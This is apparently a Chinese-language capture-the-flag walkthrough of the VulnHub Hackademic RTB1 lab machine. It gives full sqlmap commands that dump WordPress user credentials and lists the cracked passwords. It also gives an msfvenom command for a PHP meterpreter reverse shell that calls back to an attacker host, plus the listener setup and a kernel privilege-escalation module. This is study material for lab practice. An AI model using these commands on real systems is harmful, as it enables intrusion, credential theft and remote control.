VulnHub-Hackademic:RTB1

前言

  这是打靶训练第二周,视频地址靶机地址。目标是找到root下的key.txt文件。说句废话,打靶过程中,看别人通关教程,直呼我是傻逼。

信息搜集

  nmap -p- 192.168.127.130 -sV,只扫到80端口
  
  打开看很朴素
  
  目录也没扫到什么有价值的东西
  
  通过源码,我发现了一个/Hackademic_RTB1/xmlrpc.php 页面,我还以为是从这个地方入手,搞了半天确实有漏洞,但不是这关的入手点。
  
  再次使用dirsearch,扫描Hackademic_RTB1目录
  
  得到wp-login.php,发现是wordpress后台。接下来就是要得到用户名和密码了。
  
  发现在/Hackademic_RTB1/?cat=1'存在注入点。
  
  上sqlmap梭哈sqlmap -u "http://192.168.127.130/Hackademic_RTB1/?cat=1" --dbs,获取如下数据库
  
  获取wordpress数据库中的表sqlmap -u "http://192.168.127.130/Hackademic_RTB1/?cat=1" -D wordpress --tables
  
  查看wp_users表有哪些属性sqlmap -u "http://192.168.127.130/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users --columns
  
  查看user_login,user_pass字段值sqlmap -u "http://192.168.127.130/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users -C user_login,user_pass --dump
  
  md5在线解密后,得到如下数据

用户名           密码
NickJames     	admin
MaxBucky     	kernel
GeorgeMiller 	q1w2e3
JasonKonnors  	maxwell
TonyBlack     	napoleon
JohnSmith     	PUPPIES 

getshell

  回到刚刚的wordpress页面,每个用户都登录看了看,发现GeorgeMiller才是真正的管理员,然后到Options->Miscellaneous可以设置文件上传,并在Allowed file extensions添加php。
  
  生成php马msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.127.132 lport=6789 -f raw >./phpbackdoor.php
  
  开启msf监听handler -H 192.168.127.132 -P 6789 -p php/meterpreter/reverse_tcp
  
  Upload处上传刚刚生成的php马
  
  
  访问给出的路径地址,即可成功建立session。
  

提权

  查看内核版本是2.6.31.5,使用search 2.6.3,查找可提权模块。
  
  还有其他工具可以查询提权模块如,老版本的Linux_Exploit_Suggester,和新版本的linux-exploit-suggester。建议打靶的时候先使用老版本的,因为新版本的查询出来的可提权模块,实在是太多了,如果一个一个试要费大量时间。
  这里使用的是exploit/linux/local/rds_priv_esc
  
  打靶完毕,收工!

查看评论 -
评论